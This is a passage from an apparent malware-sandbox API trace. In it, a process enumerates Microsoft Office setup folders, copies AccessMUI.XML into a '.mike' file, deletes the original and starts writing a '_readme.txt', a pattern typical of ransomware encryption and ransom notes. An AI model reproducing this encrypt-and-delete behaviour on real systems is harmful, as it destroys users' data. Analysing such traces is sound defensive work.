ftLastAccessTime.dwLowDateTime=0x84c615c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x84c615c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VISIOR", cAlternateFileName="")) returned 1 [0052.532] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e501370, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1e501370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1e501370, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Word.en-us", cAlternateFileName="WORD~1.EN-")) returned 1 [0052.532] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0052.532] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0052.533] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\.", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us", lpFilePart=0x0) returned 0x5c [0052.533] CoTaskMemAlloc (cb=0x20c) returned 0x502980 [0052.533] GetSystemDirectoryW (in: lpBuffer=0x502980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0052.533] CoTaskMemFree (pv=0x502980) [0052.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0052.533] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us", nBufferLength=0x105, lpBuffer=0x2aec94, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us", lpFilePart=0x0) returned 0x5c [0052.533] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us", lpFilePart=0x0) returned 0x5c [0052.533] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\", nBufferLength=0x105, lpBuffer=0x2aec38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\", lpFilePart=0x0) returned 0x5d [0052.533] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\*", lpFindFileData=0x2aee84 | out: lpFindFileData=0x2aee84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15419830, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x17bd2750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x17bd2750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0052.536] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15419830, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x17bd2750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x17bd2750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.536] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa5fe940, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x15419830, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfa5fe940, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x545, dwReserved0=0x0, dwReserved1=0x0, cFileName="AccessMUI.XML", cAlternateFileName="ACCESS~1.XML")) returned 1 [0052.536] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x17bd2750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x333, dwReserved0=0x0, dwReserved1=0x0, cFileName="AccessMUISet.XML", cAlternateFileName="ACCESS~2.XML")) returned 1 [0052.537] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc111bb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x17bd2750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfc111bb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xa40, dwReserved0=0x0, dwReserved1=0x0, cFileName="SETUP.XML", cAlternateFileName="")) returned 1 [0052.537] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0052.537] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0052.538] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML", lpFilePart=0x0) returned 0x6a [0052.538] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML", lpFilePart=0x0) returned 0x6a [0052.538] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML", lpFilePart=0x0) returned 0x6a [0052.538] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.539] GetFileType (hFile=0x288) returned 0x1 [0052.539] GetFileType (hFile=0x288) returned 0x1 [0052.539] CloseHandle (hObject=0x288) returned 1 [0052.539] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML", lpFilePart=0x0) returned 0x6a [0052.539] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML", lpFilePart=0x0) returned 0x6a [0052.539] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aebcc, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0052.539] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0052.539] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x21a8ed0 | out: lpFileInformation=0x21a8ed0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa5fe940, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x15419830, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfa5fe940, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x545)) returned 1 [0052.539] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML", lpFilePart=0x0) returned 0x6a [0052.539] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x21a927c | out: lpFileInformation=0x21a927c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa5fe940, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x15419830, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfa5fe940, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x545)) returned 1 [0052.539] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML", lpFilePart=0x0) returned 0x6a [0052.539] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML.mike", lpFilePart=0x0) returned 0x6f [0052.540] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmui.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0052.540] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML", lpFilePart=0x0) returned 0x6a [0052.540] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML", lpFilePart=0x0) returned 0x6a [0052.540] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML", nBufferLength=0x105, lpBuffer=0x2aebac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML", lpFilePart=0x0) returned 0x6a [0052.540] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML.mike", nBufferLength=0x105, lpBuffer=0x2aebb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML.mike", lpFilePart=0x0) returned 0x6f [0052.540] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmui.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af08c | out: lpFileInformation=0x2af08c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0052.540] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML.mike", lpFilePart=0x0) returned 0x6f [0052.540] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmui.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.541] GetFileType (hFile=0x288) returned 0x1 [0052.541] GetFileType (hFile=0x288) returned 0x1 [0052.541] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x0 [0052.541] WriteFile (in: hFile=0x288, lpBuffer=0x21aa4d8*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af02c, lpOverlapped=0x0 | out: lpBuffer=0x21aa4d8*, lpNumberOfBytesWritten=0x2af02c*=0x220, lpOverlapped=0x0) returned 1 [0052.542] CloseHandle (hObject=0x288) returned 1 [0052.542] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x21a9f04 | out: lpFileInformation=0x21a9f04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa5fe940, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x15419830, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfa5fe940, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x545)) returned 1 [0052.542] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML", nBufferLength=0x105, lpBuffer=0x2aeaa8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML", lpFilePart=0x0) returned 0x6a [0052.542] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.542] GetFileType (hFile=0x288) returned 0x1 [0052.542] GetFileType (hFile=0x288) returned 0x1 [0052.542] ReadFile (in: hFile=0x288, lpBuffer=0x21ab64c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x21ab64c*, lpNumberOfBytesRead=0x2af038*=0x545, lpOverlapped=0x0) returned 1 [0052.544] CloseHandle (hObject=0x288) returned 1 [0052.544] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML.mike", lpFilePart=0x0) returned 0x6f [0052.544] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmui.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.544] GetFileType (hFile=0x288) returned 0x1 [0052.544] GetFileType (hFile=0x288) returned 0x1 [0052.544] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x220 [0052.545] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML.mike", nBufferLength=0x105, lpBuffer=0x2aeac0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML.mike", lpFilePart=0x0) returned 0x6f [0052.545] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmui.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.545] GetFileType (hFile=0x288) returned 0x1 [0052.545] GetFileType (hFile=0x288) returned 0x1 [0052.546] WriteFile (in: hFile=0x288, lpBuffer=0x21b377c*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x21b377c*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0052.546] CloseHandle (hObject=0x288) returned 1 [0052.547] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML", lpFilePart=0x0) returned 0x6a [0052.547] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML.mike", lpFilePart=0x0) returned 0x6f [0052.547] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmui.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe89b0ee0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe89b0ee0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe89d7040, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x770)) returned 1 [0052.547] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML", lpFilePart=0x0) returned 0x6a [0052.547] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML.mike", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML.mike", lpFilePart=0x0) returned 0x6f [0052.547] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmui.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x21b514c | out: lpFileInformation=0x21b514c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe89b0ee0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe89b0ee0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe89d7040, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x770)) returned 1 [0052.547] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML", lpFilePart=0x0) returned 0x6a [0052.547] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML", dwFileAttributes=0x80) returned 1 [0052.548] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML", nBufferLength=0x105, lpBuffer=0x2aec50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML", lpFilePart=0x0) returned 0x6a [0052.548] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmui.xml")) returned 1 [0052.549] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML", lpFilePart=0x0) returned 0x6a [0052.549] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0052.549] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML", lpFilePart=0x0) returned 0x6a [0052.549] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeae4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\_readme.txt", lpFilePart=0x0) returned 0x68 [0052.549] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup 